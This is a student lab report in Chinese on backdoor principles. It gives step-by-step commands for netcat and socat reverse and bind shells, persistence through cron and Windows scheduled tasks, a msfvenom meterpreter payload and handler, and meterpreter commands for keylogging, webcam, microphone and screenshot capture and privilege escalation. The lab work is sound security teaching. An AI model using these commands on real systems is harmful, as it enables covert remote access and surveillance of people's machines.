Document

20174324 次旦加措 网络对抗技术 Exp2-后门原理与实践

一 实验名称

后门原理与实践

1.1 实验内容

使用Netcat获取主机操作 Shell,cron启动。

使用socat获取主机操作Shell,任务计划启动。

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。

可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

1.2 实验目标

掌握后门的概念,知道常见的后门种类,深入理解后门的运作原理。

掌握几种常见的后门工具,学会利用后门工具进行一些简单操作。

增强信息安全意识,认识到后门的危害性,提高对后门的防范意识。

二 实验开始

1准备

https://gitee.com/wildlinux/NetSec/attach_files中,可以下载本次实验所需的ncat.rar和socat.rar。

将压缩包解压,放到指定的位置,即完成“安装”。

2 查询IP地址

在PC中的cmd中,使用ipconfig指令,得知PC机IP地址为192.*********

在Kali中打开终端,输入ip add,得知Kali端IP地址为192.********

3 Win获得Linux Shell

在PC端打开cmd,输入ncat -l -p 4314。

在Kali端打开终端,输入nc 192.168.1.194 4314 -e /bin/sh。

返回PC端,发现PC端成功攻击Kali端,输入ls测试,可以读取到Kali端的目录。

4 Linux获得Windows Shell

在Kali端打开终端,输入nc -l -p 4314。

在PC端打开cmd,输入ncat -e cmd.exe 192.168.133.130 4314。

返回Kali端,发现Kali端成功攻击PC端。

5 netcat传输数据

在PC输入ncat -l 4324。

在Kali端输入192.********* 4324。

连接成功,双方即可以相互通信。

6 netcat传输文件

在PC端输入ncat -l 4324> 20174324.txt。

在Kali端输入nc 192.********4324 < PC_to_Kali.out。

即可在Kali端查询到PC端传输的文件。

在Kali端输入nc -l 4324 > 20174324.txt。

在PC端输入ncat 192.******* 4324 < Kali_to_PC.out。

即可在PC端查询到Kali端传输的文件。

  

7 使用 Netcat 获取主机操作 Shell ,cron 启动

 

在PC端,输入ncat -l -p 4324,回车。

在Kali端,输入crontab -e,回车,选择5,回车。

在Kali端,按i,在最后一行添加43 * * * * /bin/netcat 192.*******4324 -e /bin/sh,回车。

8 使用socat获取主机操作Shell,任务计划启动

 

在PC端,  在Windows主机上按下win+r,输入compmgmt.msc唤出计算机管理界面,在这里创建一个新的定时任务。

  打开【计算机管理】-【系统工具】-【任务计划程序】-【创建任务】

打开【创建任务】-【触发器】-【新建...】。

设置【开始任务】为【工作站锁定时】。

打开【操作】-【新建...】。

将【操作】设置为【启动程序】。

将【程序或脚本】设置为socat的保存路径,此处设置为【C:\Users\8888\socat.exe】。

将【添加参数】设置为【tcp-listen:4324 exec:cmd.exe,pty,stderr】。

打开【任务计划程序】-【任务计划程序库】。

在PC端,锁定计算机,再启动计算机。

在Kali端,输入socat - tcp:192.***********

【执行socat,连接到PC端的4314端口,成功获得cmd Shell。】

 

9 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

 

在Kali端,输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.133.130 LPORT=4314 -f exe > backdoor_20174314.exe,回车。

在PC端,输入ncat.exe -lv 4314 > backdoor_20174314.exe,回车。

在Kali端,输入nc 192.168.1.194 4314 < backdoor_20174314.exe,回车。

【在Kali内生成后门程序,并将Kali端设置为控制端。在PC端开启文件接受模式,并在Kali端传输文件,即完成将后门文件置入PC端。】

在Kali端,输入msfconsole,回车。

在Kali端,输入use exploit/multi/handler,回车。

在Kali端,输入set payload windows/meterpreter/reverse_tcp,回车。

在Kali端,输入set LHOST 192.***********,回车。

在Kali端,输入set LPORT 4324,回车。

在Kali端,输入exploit,回车。

在PC端,输入backdoor_20174324.exe。

在Kali端,输入dir,回车。

【Kali端通过msf进行监听,同时PC端也将后门为其敞开,Kali端就得到了Shell。】

9.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

 

在Kali端,输入record.mic。通过指令可以截获音频。

在Kali端,输入webcam_snap。可以通过指令使用摄像头拍照。

在Kali端,输入keyscan_start。

在PC端,使用微信输入一串字符。

在Kali端,输入keyscan_dump,回车。

【可以通过指令读取键盘输入记录。】

在Kali端,输入screenshot,回车,可以通过指令截取屏幕

输入getuid,回车。

输入system,回车。

输入msfconsole,回车。

输入use exploit/multi/handler,回车。

输入use exploit/windows/local/ask,回车。

输入set payload windows/meterpreter/reverse_tcp,回车。

输入set lhost 192.**********,回车。

输入set filename win_update.exe,回车。

输入set session 1,回车。

输入options,回车。

输入exploit,回车。

输入getuid,回车。

输入getsystem,回车。【成功提权。】

5.1 实验问题回答

5.1.1 例举你能想到的一个后门进入到你系统中的可能方式?

游览网站中附带的广告或弹出的不正规软件。

5.1.2 例举你知道的后门如何启动起来(win及linux)的方式?

windows操作系统有定时任务启动,linux有定时任务启动。

 

 

 

 

 

posted @ 2020-05-27 12:59  20174324次旦加措  阅读(90)  评论(0编辑  收藏  举报